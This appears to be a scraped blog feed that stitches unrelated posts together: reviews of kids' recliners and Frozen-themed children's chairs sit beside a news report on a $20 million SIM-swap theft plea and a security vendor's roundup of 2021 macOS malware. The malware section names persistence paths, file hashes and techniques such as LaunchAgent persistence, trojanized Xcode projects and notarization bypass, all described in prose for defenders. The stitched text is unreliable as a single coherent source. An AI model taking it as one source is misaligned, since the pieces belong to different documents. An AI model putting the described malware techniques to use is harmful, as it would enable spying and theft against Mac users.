The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage is perfect for children aged 3 and up. It has a weight capacity of 90 pounds and reclines all the way back. It is a perfect mini version of the recliner for adults! This makes it ideal for taking a quick nap or just relaxing after a long day of play.

The faux leather upholstery is easy to clean, and the chair comes in a variety of adorable colors, including brown, pink, and beige.

Armrests of this kids’ recliner hide storage compartment for books, video game controllers, remotes, and more.
The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage receives 4.7 stars out of 5 on Amazon from over 1,500 reviews. Parents love the reclining function and color selection of this chair, as well as the storage compartments on the armrests. They also find that it is a very comfortable chair for their kids to relax. It is also a good value for money!

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner with Cup Holder and Headrest

This easy recliner provides the comfort that grown-ups enjoy, making it ideal for small children. Your child will be entertained knowing they may sit in this push-back recliner while the family gathers in the living room to watch TV and movies.

The chair can support up to 90 pounds and has a safety mechanism that works as follows: as soon as the kid is in a seated position and the ottoman is pulled out one inch, the seat will recline. This child-sized recliner will look fantastic in your living room, bedroom, or playroom.

The LeatherSoft upholstery is resilient enough to withstand active children, making cleanup a breeze. With an enormous headrest, solid hardwood structure, and a cup holder in the arm to keep their favorite drink, you’ll have no trouble selecting this item.

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner comes in a variety of different colors and has a 4.7-star rating on Amazon with over 8000 reviews! Parents love this chair for its sturdy build, comfortable design, and easy to clean fabric.

As you can see, there are many different types of chairs that are perfect for kids. No matter what your child’s personality or interests may be, you will be able to find a chair that suits them. You can even get matching furniture for the whole family!

Happy shopping and enjoy your new chair!

The post Is A Leather Chair Suitable For Kids? appeared first on Comfy Bummy.

NY Man Pleads Guilty in $20 Million SIM Swap Theft

/0 Comments/in /by

A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.

Truglia admitted to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.

Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury criminally indicted Truglia (PDF) for his part in the crypto theft from Terpin.

A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.

Nicholas Truglia, holding bottle. Image: twitter.com/erupts

But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.

Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.

Reached for comment, Terpin said his assailant got off easy.

“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.

Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.

“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”

Nicholas Truglia, showing off a diamond-studded Piaget watch while aboard a private jet. Image: twitter.com/erupts.

Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.

“On the surface, Pinsky is an ‘All American Boy,’” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”

“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”

Pinksy could not be immediately reached for comment. But a review of the latest filings in the lawsuit show that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.

Ellis Pinsky, in a photo uploaded to his social media profile.

Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the REACT task force, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities arrested Truglia on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website stopsimcrime.org.

According to published reports, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.

Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.

Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.

“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”

West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.

“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”

All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or corrupt mobile store employees.

For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at the conclusion of this story.

The best Frozen kids chairs for Disney fans

/0 Comments/in /by

Disney Frozen is probably the most popular animated movie of the last couple of years. It has conquered millions of hearts and turned little girls everywhere into true fans eager to see anything and everything that had something to do with their beloved characters: Anna and Elsa. Well, we have great news for all of you Frozen fans out there!

We’ve done some research and found the best Frozen kids chairs for you to buy. Not only are they super exciting and fun, but they are also durable enough to hold the weight of your little princess (or prince) for years.

Take a look at some of the best Frozen kids chairs currently available:

Delta Children Upholstered Chair, Disney Frozen

It is no surprise that Delta Children’s kids’ chairs lead our list. The company is widely known for its attention to detail and quality of products. This specific one is no exception. It has a pretty straightforward design, but it looks super cute.

The polyester fabric of the chair backs promises durability while still being soft enough to be comfortable for your kids. The characters on the chair will keep your child entertained for hours on end, and the high-back design provides excellent support – perfect for those long movie nights. The chair is recommended for kids aged 3 and older, but it can hold weights of up to 100 pounds.

This chair is available in two different designs:

Price varies depending on chosen design – Frozen kids’ chair from Delta Children can cost between $65 and $95 on Amazon, which might seem like a lot for some of you; however, we believe this is one of the best Frozen kids chairs out there!

Delta Children Figural Upholstered Kids Chair, Disney Frozen II

We just can’t get enough of Delta Children’s products, and this Figural Upholstered Kids Chair is definitely one of our favorites. It features a bit different design to the ones previously mentioned, as it sports a high-quality image of Elsa or Anna on the chair back. This gives the chair a unique look, and your child will definitely feel like a true Disney Frozen fan when sitting in it.

Like the other Delta Children’s chair, this one is also made out of polyester fabric that is not only soft but also durable. It is designed for children 3 years and up and can hold up to 100 pounds.

Check the retail price of the chair on Amazon by clicking at the name of the preferred Frozen character:

  • Elsa – Frozen II Delta Children Figural Upholstered Kids Chair
  • Anna – Frozen II Delta Children Figural Upholstered Kids Chair

Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair

Having a good desk chair is crucial for all kids, especially those who love spending time doing homework or playing games in their room. This Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair is perfect for all of you Frozen fans out there! It has a cool and modern design, featuring an image of Anna and Elsa on the back.

The chair is made out of high-quality mesh and plastic materials, making it both durable and lightweight. It also features a 360-degree swivel base, so your child can easily rotate to face the TV or desk. The chair can hold up to 225 pounds, making it perfect for both younger and older kids. The easy-to-use lever and pneumatic mechanism on this swivel workplace chair allow you to change its height to your desired level. The mesh cushioned seat is pleasant and straightforward to maintain. The curved mesh back provides support and comfort for the back.

Idea Nuova Frozen 2 Saucer Chair

A saucer chair is an original addition to any Frozen fan’s bedroom or playroom. This Idea Nuova Frozen 2 Saucer Chair is made out of high-quality and durable materials, featuring a beautiful image of Frozen trio: Anna and Elsa and Olaf on the back. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

The saucer chair is made of a sturdy metal frame and soft and comfortable fabric. It can hold up to 80 pounds, making it perfect for both younger and older kids. The metal frame has a safety locking mechanism to keep the chair sturdy and in place. The Saucer Chair also features LED lights.

The saucer chair features a foldable design that makes it easy to store when not in use. It folds flat for simple, space-saving transportation and storage. This saucer chair won’t take up much room, making it a great purchase.

Kids’ Frozen chairs – bean bags

Bean bags are truly a timeless classic, and they can be just as stylish as the most fashionable chairs. If your kid loves to sit back and relax with a good book or watch TV, then a bean bag is the perfect addition to their room!
Several bean bags featuring Frozen characters are available on the market, and we’ve chosen our favorites for you:

Disney Frozen Cozee Fluffy Chair by Delta Children

This soft and fluffy chair is perfect for all Frozen fans out there. It is made out of high-quality materials, featuring an image of Anna and Elsa on the front. The chair is designed for children aged 2-6 years old and can hold up to 60 pounds.

It provides greater comfort and support than traditional bean bag chairs since it is stuffed with shredded foam that shapes to your child’s body. The soft faux fur cover and supportive back ensure that youngsters have an oh-so-comfortable place of their own, and its lightweight construction means it can be taken anywhere your child goes. Side pockets on this chair are perfect for storing toys, books, or movie snacks.

As a bonus, the chair’s non-slip bottom keeps it in place. It’s the ideal piece of furniture for your playroom, bedroom, or living room.

Idea Nuova Disney Frozen 2 Elsa Figural Bean Bag Chair with Sherpa Trim

This Elsa Frozen Figural Bean Bag Chair is perfect for all of your favorite little Frozen fans. The bean bag is made out of soft and durable fabric, featuring a beautiful image of Elsa on the front. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

This iconic chair is a must-have for all Frozen fans, thanks to its printed image of Elsa, which is studded with winter wonderland snowflakes. The chair has Sherpa piping on the seat and arms for added warmth and comfort. It is designed for children aged 2-5 years old.

It’s a great gift idea, especially during the colder months of the year. The soft plush fabrics ensure that your child will have a cozy place to relax after a long day of playing outside.

Idea Nuova Disney Frozen Figural Bean Bag Chair

The most classic bean bag chair on this list. This fantastic round figural kid’s bean bag chair from Frozen fans will enjoy! You can’t go wrong with this adorable Frozen decorative bean bag, which features a broderie of the famous character Elsa. Excellent addition to any space and a must-have in every child’s room.

This bean bag chair is made of polyester fabric and is sturdy and long-lasting. This bean bag chair can support up to 81 pounds. This bean bag chair is also relatively small, making it perfect for younger children. Plus, it is convenient to take it with you for movie nights at your friend’s or family members’ house.

Idea Nuova Frozen 2 Kids Nylon Bean Bag Chair with Piping & Top Carry Handle with Olaf Graphics

Frozen is not only about Elsa and Anna! This movie would not be the same without Olaf either. Kids can now enjoy their favorite Frozen scenes and characters with this Olaf bean bag chair! It is a perfect addition to any bedroom, living room, playroom, or even classroom. It has a design featuring Olaf’s smiling face on the front, and it is made out of high-quality nylon fabric, which will not fray over time.

The bean bag features a top carry handle for easy transportation from room to room as needed. This bean bag chair can hold up to 60 pounds and has a size of 18” x 18” x 11”. Great for kids aged 2-5 years old.

Bean bag chairs are the perfect gift idea, especially if they are character-themed. They are fun and comfy, so kids will love sitting on them watching TV, reading books, or playing games. All of these bean bags can be purchased on Amazon.

Frozen kids’ camping chairs for those Northern Adventures!

What’s a better way to enjoy the great outdoors than with an adventure inspired by Frozen? These chairs are perfect for your little ones who want to join in on all the fun! The chairs are made of durable and lightweight materials so that they can be easily transported from one spot to another. They are also comfortable, thanks to the padded seats and armrests, which provide better back support. The chairs can fold flat and include straps for easier transport. With these chairs, you can turn any outdoor event into something Frozen-tastic!

The Frozen-themed kids’ camping chairs from Jakks Pacific caught our attention. Jakks Pacific is a well-known toy and collectibles manufacturer that collaborates with some of the biggest licensors in the entertainment industry. Their Frozen camping chairs are officially licensed Disney products.

The chairs are designed for children aged 3 and up. They are made of polyester and have a weight limit of 100 pounds. The dimensions of the chairs are 21.5″D x 12.9″W x 20.38″H and weigh under 3 pounds each.

Frozen-themed activity furniture for the kids’ playroom

There are tons of Frozen toys available, but how about some furniture? These activity tables are perfect for the Frozen-themed playroom!

Delta Children Kids Table and Chair Set

Frozen theme kids table in Delta children collection This activity table has a cute Frozen-themed design. The table and chairs are made of solid and durable wood, and they can be easily cleaned. The chairs can hold up to 50 pounds each.

The Frozen activity table is perfect for arts and crafts, snacks, or homework time. It would also be great for playing games or just reading a book. The table includes a storage bin where kids can keep all their art supplies.

The table and chairs set are ideal for children aged 2-6 years old. Kids won’t want to stop playing with them! They will be having so much fun!

Delta Children Kids Convertible Activity Bench, Disney Frozen II

It’s a must-have for any growing youngster. It has a 3-in-1 design that instantly transforms from a storage bench to a desk, allowing your child to transition between playtime and ideal homework conditions in seconds!

This extremely flexible workstation also includes two fabric bins beneath, making it the ideal location for kids to store their toys, books, or art materials. This durable activity bench can be used by children aged 3-7.

Idea Nuova Disney Frozen II 3 Piece Collapsible Set with Storage Table and 2 Ottomans

Give your children a place to sit and a place to store their belongings! The 3 Piece Storage Table and Ottoman Set is the ideal method to keep clutter at bay while still providing a location for your child to do everything from painting to eating supper. Table and ottomans are collapsible in design for easy storage when not in use.

Table and bench duet provides hours of playtime fun while doubling as a clean surface for snack time, crafts, and more.

How is Frozen so popular?

Quite simply, Frozen is popular because it is an excellent movie. It has a great story, lovable characters, beautiful animation, and catchy songs. But beyond that, Frozen has resonated with people on a deeper level.

Some say that Frozen speaks to the universal experience of being ostracized or feeling different. Elsa, the Snow Queen, has to hide her magical powers for fear of being rejected by society. This storyline is something that a lot of people can relate to.

Additionally, Frozen addresses important topics like love, sisterhood, and self-acceptance in a meaningful and entertaining way. This is why Frozen has become such a phenomenon and is sure to be a favorite for many years to come.

The post The best Frozen kids chairs for Disney fans appeared first on Comfy Bummy.

Top 10 macOS Malware Discoveries in 2021 | A Guide To Prevention & Detection

/0 Comments/in /by

As we approach the end of 2021, we take a look at the year’s main malware discoveries targeting the macOS platform with an emphasis on highlighting the changing tactics, techniques and procedures being employed by threat actors. In particular, we hone in on what is unique about each malware discovery, who it targets and what its objectives are.

On top of that, you’ll find a breakdown of the essential behavior of each threat and links to deeper technical analyses. At the end of the post, we draw out the main lessons Mac admins and security teams can learn from this year’s crop of macOS malware to help them better protect their Mac fleets going into 2022.

Summary of Key Trends Emerging During 2021

As we will describe below, several things stand out about macOS malware in 2021. These include:

  • macOS targeted in more cross-platform malware campaigns, with malware written in Go, Kotlin and Python observed
  • A drive towards attacks on developers and other ‘high-value’ targets
  • An increasing interest in targeting macOS users in the East (China and Asia)
  • A continued reliance on using LaunchAgents as the primary persistence mechanism
  • While commodity adware is by far the most prevalent threat on macOS, most new malware families that emerged in 2021 focused on espionage and data theft.

In 2021 to-date, there have been ten new reported malware discoveries. Let’s take a look at what was unique for each one and the main points that defenders need to be aware of.

Top 10 In-the-Wild macOS Malware Discoveries 2021

1. ElectroRAT

In January 2021, Intezer reported on Operation ElectroRAT, a campaign that had been running throughout 2020 targeting cryptocurrency users. This was the first of an increasingly common-trend throughout 2021: cross-platform malware written in Go targeting macOS, Linux and Windows operating systems. The aim was to get cryptocurrency users to install a trojanized application for trading and managing cryptocurrency.

All versions were built using Electron, and once the trojan app is installed and launched, a malicious background process called “mdworker” functions as the RAT, capable of keylogging, taking screenshots, executing shell commands, and uploading and downloading files. The name was carefully chosen: “mdworker” is also the name of a legitimate system binary that powers the Mac’s Spotlight search functionality.

The malicious mdworker binary is copied from the trojan bundle and written as a hidden file in the user’s home folder. Persistence is via a property list in the user’s LaunchAgents folder.

Primary IoCs:

~/Library/LaunchAgents/mdworker.plist
~/.mdworker
/Applications/eTrader.app/Contents/Utils/mdworker

Notable Characteristics:

  • Cross-platform RAT malware written in Go
  • Uses trojanized Crypto Trading applications
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)

2. OSAMiner

Also in January, SentinelLabs reported on OSAMiner, part of a campaign that had been in existence in various forms for at least five years and which appears to target primarily Chinese and Asian Mac users by installing a hidden Monero crypto miner.

OSAMiner was novel primarily for its extensive use of multiple, run-only AppleScripts. Due to the difficulty in reversing run-only AppleScripts, this technique helped it to hide its activity. As we shall see below,  this technique (and indeed some of the code) was later copied by XCSSET.

Among other behaviors, the OSAMiner malware sets up a persistence agent and downloads the first stage of the miner by retrieving a URL embedded in a public web page.

OSAMiner persists via LaunchAgents that attempt to evade detection by using labels and file paths containing “com.apple”.

Primary IoCs:

~/Library/11.png
~/Library/k.plist
~/Library/LaunchAgents/com.apple.FY9.plist
~/Library/LaunchAgents/com.apple.HYQ.plist
~/Library/LaunchAgents/com.apple.2KR.plist
~/Library/Caches/com.apple.XX/ssl4.plist (where “XX” is any two uppercase letters)

Notable Characteristics:

  • Cryptominer
  • Uses a complex combination of run-only AppleScripts (T1059.002)
  • Retrieves next-stage URL embedded in a publicly-hosted image
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

3. Silver Sparrow

First disclosed by researchers at Red Canary, Silver Sparrow was likely intended to function as an adware/PUP delivery mechanism for unscrupulous developers willing to pay the authors for a ‘pay per install’ (PPI) mechanism. As it was, Silver Sparrow’s infrastructure was taken down before any payloads were delivered, but the infection mechanism is an interesting – and hitherto unknown – way to abuse the Installer package that defenders and analysts should be aware of.

Installer packages typically use dedicated preinstall and postinstall shell scripts for preparing and cleaning up software installations, Silver Sparrow takes a different approach and (ab)uses the Distribution file to execute bash commands via the JavaScript API during the installation process.

In the observed instances, this code sets up a persistence agent with the filename pattern init-.plist in ~/Library/LaunchAgents, writes a program executable with the file path pattern: ~/Library/Application Support/_updater/.sh, and attempts to download and execute a payload at /tmp/.

Primary IoCs:

~/Library/Application Support/verx_updater/verx.sh
~/Library/LaunchAgents/init_verx.plist
~/Library/LaunchAgents/verx.plist
~/Library/LaunchAgents/init_agent.plist
~/Library/Application Support/agent_updater

Notable Characteristics:

  • Adware Loader
  • Uses the Distribution file in Apple Package Installer
  • Downloads malware with Bash commands (T1059.004)
  • Uses the JavaScript API (T1059.007)
  • Uses a Launch Agent for persistence (T1543.001)

4. Silver Toucan/WizardUpdate/UpdateAgent

A malware with many names, this Adload dropper was variously co-discovered by Red Canary, Confiant and Microsoft across late February/early March 2021, with Microsoft also tracking changes as recently as October. Early versions of the dropper were distinctive in the way they used curl and Amazon AWS instances to download various second and third stage payloads. Microsoft also noted that UpdateAgent deploys a Gatekeeper bypass, but what particularly caught attention was the way this actor bypassed Apple’s Notarization check and succeeded in getting all their malicious packages notarized.

According to a tweet from Confiant, the trick is deceptively simple: create a benign application in a standard Apple package installer, and use the package’s postinstall script to pull down the malware.

The lesson here is clear: neither Gatekeeper nor Notarization guarantee your downloads are malware free. Seek help from other sources!

Primary IoCs:

/Library/Application Support/Helper/HelperModule
/Library/Application Support/WebVideoPlayer/WebVideoPlayerAgent
/Library/Application Support/McSnip/McSnipAgent
~/Library/Application Support/Quest/QuestBarStatusAgent
~/Library/Application Support/SubVideoTube/SubVideoTubeStatusAgent

Notable Characteristics:

  • Loader platform
  • Uses postinstall script to download payloads (T1059.004)
  • Ingress Tool/File Transfer with CURL (T1105)
  • Makes use of public cloud infrastructure for C2s
  • Malware is Notarized by Apple
  • Malware uses a Gatekeeper bypass

5. XcodeSpy

In March, SentinelLabs reported on what looked very much like a targeted attack on iOS developers using Apple’s Xcode. XcodeSpy, a trojanized Xcode project, was found in the wild targeting iOS developers with an EggShell backdoor. The malicious project was a doctored version of a legitimate, open-source project available on GitHub, which would execute an obfuscated Run Script when the developer’s build target was launched.

The dropped EggShell backdoor is a Mach-O executable able to record information from the victim’s microphone, camera, and keyboard.

While the use of a trojanized Xcode project and obfuscated Run Script is a novel vector that we have not seen before, the malware uses a tried-and-tested persistence technique,  installing a user LaunchAgent for persistence and trying to disguise it as a legitimate Apple file.

Primary IoCs:

~/Library/LaunchAgents/com.apple.usagestatistics.plist 
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
/private/tmp/.tag

Notable Characteristics:

  • Backdoor
  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Mach-O, customized EggShell instance
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

6. WildPressure

In July, Kaspersky revealed details of another cross-platform Trojan with a macOS component. According to the researchers, WildPresssure is a newly-identified APT operation targeting entities in the Middle East. The macOS component of WildPressure is embedded in a Python file, which itself is executed persistently by a LaunchAgent using com.apple as part of the label name in an effort to blend in with system processes.

The same Python file has some rudimentary AV detection logic.

While Python-based post-exploit kits are common enough on all platforms, this is the first time we have seen APT-level malware on macOS making use of a Python script in the program arguments of a LaunchAgent.

Primary IoCs:

~/Library/LaunchAgents/com.apple.pyapple.plist
~/Library/LaunchAgents/apple.scriptzxy.plist
~/.appdata/grconf.dat

Notable Characteristics:

  • Backdoor
  • Cross-Platform
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses Python for its executable (T1059.006)

7. XLoader

Also first described in July (this time by CheckPoint) and also cross-platform, XLoader is a Malware-as-a-Service info stealer and keylogger. The Mac version of XLoader is unusual in several regards, but primarily because it is Java-based. Finding Java installs on Macs these days is not a common occurrence, and with the exception of  people playing Minecraft or researchers using Ghidra, the most common uses for Java on macOS are Java developers and certain legacy business and banking applications.

XLoader’s executable is a heavily stripped and obfuscated Mach-O dropped in the User’s  Home folder. It also drops a hidden application bundle in the same location containing a copy of itself. It then loads a user LaunchAgent for persistence with the program argument pointing to the hidden app bundle. All file names are randomized and vary from execution to execution. Among other things, XLoader will attempt to steal credentials from Chrome and Firefox browsers.

Detection of XLoader in SentinelOne console

Primary IoCs:

XLoader Mach-O Executable: KIbwf02l
7edead477048b47d2ac3abdc4baef12579c3c348

Suspected Phishing lure attachment: Statement SKBMT 09818.jar
b8c0167341d3639eb1ed2636a56c272dc66546fa

Example Persistence LaunchAgent: com.j85H64iPLnW.rXxHYP
cb3e7ac4e2e83335421f8bbc0cf953cb820e2e27

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Requires JRE runtime to be installed on victim machine
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses random file names unique for each instance
  • Defense evasion via hidden artifacts (T1564.001)

8. XCSSET Updated

XCSSET malware was initially described by Trend Micro last year, in August 2020. However, the malware has undergone quite a lot of development in that time, and by July 2021 there had certainly been enough changes to warrant revisiting it. Like OSAMiner (See Item 2, above), XCSSET makes heavy use of run-only AppleScripts, and both use the same AppleScript code in their string encryption and decryption routines.

AppleScript string decryption routine used in both XCSSET and OSAMiner malware

At one point, Apple linked OSAMiner and XCSSET together in their XProtect signature file, branding them both part of the same family they called “DubRobber”. That link no longer appears in XProtect, but the code sharing is certainly intriguing. Both malware families appear to be targeting primarily Chinese and Asian macOS users, with some suggestions that XCSSET is aimed at Chinese gambling sites and users.

Despite the similarities noted, XCSSET and OSAMiner share little else in common. XCSSET is vastly more complex and makes use of many different components and TTPs that make it difficult for traditional AV software to detect and easy for the authors to adapt. Among those is the use of shc, a publicly available shell script compiler that makes XCSSET Mach-O binaries opaque to static signature scanning engines like XProtect, meaning the only sure way to catch XCSSET is through behavioral detection.

XCSSET also uses other publicly available projects to replace the user’s browser Dock icon with a fake one that launches the malware whenever the user launches their browser from the Dock. The developers of XCSSET have also used zero-days to bypass privacy protections allowing them to take screen captures by hijacking the entitlements of other apps on the system.

Primary IoCs:

~/Library/Caches/GeoServices/.report
~/Library/Caches/GeoServices/.plist
~/Library/Caches/GeoServices/.domain
~/Library/Caches/GeoServices/AppleKit

Notable Characteristics:

  • Infostealer
  • Uses Run-only AppleScripts (T1059.002)
  • Uses Python executables (T1059.006)
  • Uses SHC shell script compiler to obfuscate shell scripts
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)
  • Replaces Browser Dock Icon
  • Steals user data from Chrome, Contacts, Notes, Opera, Skype and others
  • Injects a payload into the build phase of local Xcode projects
  • Uses a Zero Day

9. OSX.Zuru

In September, macOS malware researcher @codecolorist noticed that sponsored links in the Baidu search engine were spreading malware via trojanized versions of iTerm2. A rapid triage by Patrick Wardle dubbed the malware “OSX.Zuru”. Subsequent investigation revealed that Microsoft’s Remote Desktop for Mac was also being trojanized with the same malware, as were SecureCRT and Navicat.

The selection of trojanized apps is interesting and suggests the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

However, given that the only known distribution method to date relies on sponsored web searches, indications are that this is a “shotgun” approach in the hope of hovering up interesting targets rather than a specifically-targeted campaign.

The threat actor had modified the original application bundles with a malicious dylib in the .app/Contents/Frameworks/ folder called libcrypto.2.dylib. This downloads two further components: a python script dropped at /tmp/g.py and a heavily-obfuscated Mach-O dropped at /private/tmp/GoogleUpdate.

Analysis of this file reveals functionality for surveilling the local environment, reaching out to a C2 server and executing remote commands via a backdoor.

Primary IoCs:

/Applications/iTerm.app/Contents/Frameworks/libcrypto.2.dylib
/Applications/Microsoft Remote Desktop.app/Contents/Frameworks/libcrypto.2.dylib
/private/tmp/GoogleUpdate
/tmp/g.py

Notable Characteristics:

  • Backdoor
  • Uses a Mach-O executable
  • Uses Python (T1059.006)
  • Attempts to disguise itself as GoogleUpdate

10. macOS.Macma

In November, Google’s TAG published details of a threat they labelled macOS.Macma. Macma appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Both a zero day and a N-day (a known vulnerability with an available patch) were used at various points in the campaign; namely, a remote code execution (RCE) 0-day in WebKit and a local privilege escalation (LPE) in the XNU kernel.

The malware, which appears to date from at least 2019, is delivered in two distinct ways: one via trojanized app containing several malicious binaries and a shell script in its Resources folder; and two, by a watering-hole attack to visitors of certain websites.

It primarily functions as a keylogger, screen capturer, and backdoor.

macOS.Macma execution chain as seen in the SentinelOne console

Primary IoCs:

~/Library/LaunchAgents/com.UserAgent.va.plist
~/Library/Preferences/UserAgent/lib/UserAgent
~/Library/Preferences/Tools/arch
~/Library/Preferences/Tools/kAgent
~/Library/Preferences/Tools/at

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Zero Day
  • Uses a patched vulnerability, targeting users that failed to patch
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)

What Can We Learn From This Year’s macOS Malware?

It’s been said that the past is no reliable guide to the future (thanks, David Hume!), and that goes double when we are talking about malware trends, but there are certainly some interesting developments this year that we haven’t seen quite so pronounced in the past.

In the malware we’ve seen this year, we note first of all an increasing trend towards cross-platform development. This is something we have observed in the commodity adware market, too. Adload, for example, has been experimenting not only with malware written in Google’s Go language, but also in Kotlin.

Secondly, we note that a significant number of campaigns targeting macOS users either originated from or were targeted towards (or both) Chinese and Asian macOS users. This no doubt reflects a number of factors: the increasing importance of the macOS operating system in Asian markets, and an increasing familiarity with macOS development skills among macOS malware authors either from, or interested in, spying on that part of the world. Note that XCSSET, OSX.Zuru and macOS.Macma in particular show a high-level of familiarity with the macOS platform. However, XcodeSpy was discovered in a large, well-known U.S. organization, so it’s certainly not the case that all the recent macOS malware traffic is heading east.

We’ve also seen a number of attacks targeting software developers: XcodeSpy, XCSSET and XLoader all target environments that you might typically find on an enterprise developer’s Mac.

At least three of this year’s ten new malware families were also likely highly-targeted, possibly APT, attacks: XcodeSpy, WildPressure, and macOS.Macma all had very particular targets in mind and do not appear to be primarily financially motivated.

Similarly, the number of malware families whose primary function is espionage – backdoors, RATs, and keyloggers – is notable: 6 out of 10 of this year’s new macOS malware were aimed at spying on or taking over the computers of targets. Of the other four, two were loader platforms and two were related to cryptocurrency: either stealing it or mining it.

While threat actors expand their range of TTPs and seek to leverage known and undiscovered vulnerabilities, it is worth noting that by far the majority continue to rely on exploiting LaunchAgents for persistence. This offers plenty of opportunities for detection and protection. At the same time, security teams are advised to prepare for the possibility that threat actors will soon start to explore less obvious ways to persist.

Conclusion

For enterprises running macOS fleets, the message from this year’s malware discoveries is clear: threat actors are becoming increasingly interested in the macOS platform, are more familiar with how to exploit it, and are interested in high-value targets.

It is imperative for all security teams to prepare to defend against increasing numbers of increasingly sophisticated attacks on the Mac platform. SentinelOne and SentinelLabs has published several ebooks to help Mac admins, IT teams and security administrators further understand the risks and fortify their defenses, these include A Guide to macOS Threat Hunting and Incident Response and The Complete Guide to Understanding Apple Mac Security for Enterprise. Analysts may also wish to consult our How To Reverse Malware on macOS ebook as well as the SentinelLabs’ series of posts on reversing macOS malware with radare2.

The Complete Guide to Understanding Apple Mac Security for Enterprise
